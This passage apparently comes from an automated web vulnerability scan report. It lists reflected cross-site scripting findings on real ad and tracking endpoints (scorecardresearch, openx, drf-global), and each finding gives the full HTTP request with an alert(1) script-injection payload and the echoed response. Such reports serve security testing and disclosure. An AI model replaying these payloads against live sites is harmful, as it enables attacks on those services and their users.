The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload d5d70<script>alert(1)</script>e85dc046e5c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=d5d70<script>alert(1)</script>e85dc046e5c&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:52 GMT
Date: Sun, 02 Oct 2011 23:52:52 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"d5d70<script>alert(1)</script>e85dc046e5c", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.44. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 24b3b<script>alert(1)</script>279d6872fb9 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=24b3b<script>alert(1)</script>279d6872fb9&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:52 GMT
Date: Sun, 02 Oct 2011 23:52:52 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"24b3b<script>alert(1)</script>279d6872fb9", c6:"", c10:"", c15:"", c16:"", r:""});



4.45. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 6e3ec<script>alert(1)</script>d0298376d15 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=6e3ec<script>alert(1)</script>d0298376d15&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:53 GMT
Date: Sun, 02 Oct 2011 23:52:53 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"6e3ec<script>alert(1)</script>d0298376d15", c10:"", c15:"", c16:"", r:""});



4.46. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload a5007<script>alert(1)</script>25b039ed36e was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_23202976328a5007<script>alert(1)</script>25b039ed36e&pid=c8eddb4a-d9d5-0c5b-6e12-562295aa26ea&s=728x90&f=1.3&url=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news&cid=oxpv1%3A34-632-1929-2254-6393&hrid=77e73cd01694ae3edcb772febdf4acd1-1317599425 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1317129774; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache

OXM_23202976328a5007<script>alert(1)</script>25b039ed36e({"r":null});

4.47. http://d.tradex.openx.com/afr.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca534</script><script>alert(1)</script>a6853b22006 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HEREca534</script><script>alert(1)</script>a6853b22006 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:54:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%5D%5D%3E%3E; expires=Mon, 01-Oct-2012 23:54:23 GMT; path=/
Content-Length: 2791
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HEREca534</script><script>alert(1)</script>a6853b22006&loc=")', 40000);
// ]]>
...[SNIP]...

4.48. http://d.tradex.openx.com/afr.php [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55a13</script><script>alert(1)</script>3f8ba84e66c was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=55a13</script><script>alert(1)</script>3f8ba84e66c HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmb=20948333.6.6.1317599444; __utmc=20948333; __utmz=20948333.1317599444.1.1.utmcsr=goal.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/teams/england/97/man-utd-news; __qca=P0-1745582797-1317599446738; __csref=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%27; expires=Mon, 01-Oct-2012 23:57:23 GMT; path=/
Content-Length: 3019
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=55a13</script><script>alert(1)</script>3f8ba84e66c")', 40000);
// ]]>
...[SNIP]...

4.49. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5849</script><script>alert(1)</script>2ba89ba78d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&c5849</script><script>alert(1)</script>2ba89ba78d=1 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:55:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%27; expires=Mon, 01-Oct-2012 23:55:30 GMT; path=/
Content-Length: 2795
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&c5849</script><script>alert(1)</script>2ba89ba78d=1&loc=")', 40000);
// ]]>
...[SNIP]...

4.50. http://d.tradex.openx.com/afr.php [zoneid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the zoneid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 713c9</script><script>alert(1)</script>3b14e1cb0e2 was submitted in the zoneid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511713c9</script><script>alert(1)</script>3b14e1cb0e2&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%5D%5D%3E%3E; expires=Mon, 01-Oct-2012 23:53:21 GMT; path=/
Content-Length: 853
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511713c9</script><script>alert(1)</script>3b14e1cb0e2&cb=INSERT_RANDOM_NUMBER_HERE&loc=")', 40000);
// ]]>
...[SNIP]...

4.51. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4765"%3balert(1)//842209825e9 was submitted in the mid parameter. This input was echoed as a4765";alert(1)//842209825e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1a4765"%3balert(1)//842209825e9&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:04 GMT
Server: Apache
Set-Cookie: JSESSIONID=9AE5B1EE946FD6F0C0A430487526B06D.p0529; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.63
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4620

function Miwe1a4765";alert(1)//842209825e9() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/cl
...[SNIP]...
       },
       search: {
           type: "JS_OBJECT",
           uid: "9484261c-5e39-4ffd-a8b2-5f3e43a6e87f"
       }
   }
}
Miwe1a4765";alert(1)//842209825e9.prototype.getParts = function() {
return this.parts;
}
Miwe1a4765";alert(1)//842209825e9.prototype.getPart = function(id) {
return this.parts[id];
}
window["miwe1a4765";alert(1)//842209825e9"] = new Miwe1a4765";alert(1)//842209825e9();


4.52. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The value of the mid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7d70%3balert(1)//b2842205c0b was submitted in the mid parameter. This input was echoed as e7d70;alert(1)//b2842205c0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1e7d70%3balert(1)//b2842205c0b&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:05 GMT
Server: Apache
Set-Cookie: JSESSIONID=F5E192AC799744E1978CC2777215B349.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4615

function Miwe1e7d70;alert(1)//b2842205c0b() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http://www.orbitz.co
...[SNIP]...

4.53. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The value of the mid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ffe58%3balert(1)//d4209f9fb72 was submitted in the mid parameter. This input was echoed as ffe58;alert(1)//d4209f9fb72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0ffe58%3balert(1)//d4209f9fb72&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=DC3EB887B493EAE1352D240AB8EE0CBC.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5159

function Miwe0ffe58;alert(1)//d4209f9fb72() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDwvcD4NCgkJPHA+SG
...[SNIP]...

4.54. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98c61"%3balert(1)//bb08c81a782 was submitted in the mid parameter. This input was echoed as 98c61";alert(1)//bb08c81a782 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=098c61"%3balert(1)//bb08c81a782&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=8F129309865236AA29C043EFCB3D41D2.p0524; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.58
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5164

function Miwe098c61";alert(1)//bb08c81a782() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGV
...[SNIP]...
opping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js"
       }
   }
}
Miwe098c61";alert(1)//bb08c81a782.prototype.getParts = function() {
return this.parts;
}
